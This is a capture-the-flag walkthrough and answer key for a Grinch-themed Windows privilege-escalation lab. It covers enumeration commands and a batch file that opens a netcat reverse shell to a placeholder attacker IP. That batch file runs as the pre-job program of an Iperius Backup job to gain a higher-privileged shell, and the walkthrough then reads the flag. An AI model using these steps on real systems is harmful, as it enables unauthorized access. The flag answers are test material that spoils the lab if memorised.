- Complete the username: p…..
ANS: pepper
EXPLANATION:
Step 1: net users
2. What is the OS version?
ANS: 10.0.17763 N/A Build 17763
EXPLANATION:
Step 1: systeminfo | findstr /B /C:“OS Name” /C:“OS Version”
3. What backup service did you find running on the system?
ANS: IperiusSvc
EXPLANATION:
Step 1: wmic service list
4. What is the path of the executable for the backup service you have identified?
ANS: C:\Program Files (x86)\Iperius Backup\IperiusService.exe
EXPLANATION:
5. Run the whoami command on the connection you have received on your attacking machine. What user do you have?
ANS: the-grinch-hack\thegrinch
EXPLANATION:
Step 1:
@echo off
C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 1337 -e cmd.exe
and save as test.bat
Step 2: Open Iperius Backup.exe
Step 3: Setup listener on attacking machine
nc -nlvvp 443
Step 4: pen Iperius Backup and create new backup job
— set any folder to backup (c:\temp)
— set to any destination (c:\users\low\desktop)
— set program to run before backup job (c:\users\low\desktop\test.bat)
Step 5: Right-click on newly created job and select “Run backup service as the-grinch-hack\thegrinch
Step 6: Command prompt on attacking machine will appear
C:\Program Files (x86)\Iperius Backup>whoami
whoami
6. What is the content of the flag.txt file?
ANS: THM-736635221
EXPLANATION:
Step 1: Once we gain access, type cd ../../../
Step 2: dir
Step 3: cd Users
Step 4: dir
Step 5: cd thegrinch
Step 6: dir
Step 7: cd Documents
Step 8: type flag.txt
7. The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
ANS: jazzercize
EXPLANATION:
Step 1: type Schedule.txt
*****************THANK YOU****KEEP LEARNING ******************
HOPE YOU GUYS, THIS WALKTHROUGH MIGHT HELP YOU,IF SO LIKE THE PAGE WILL BE MUCH APPRECIATED AND FOLLOW MY PROFILE FOR MORE WRITE-UPS
*******PEACE*****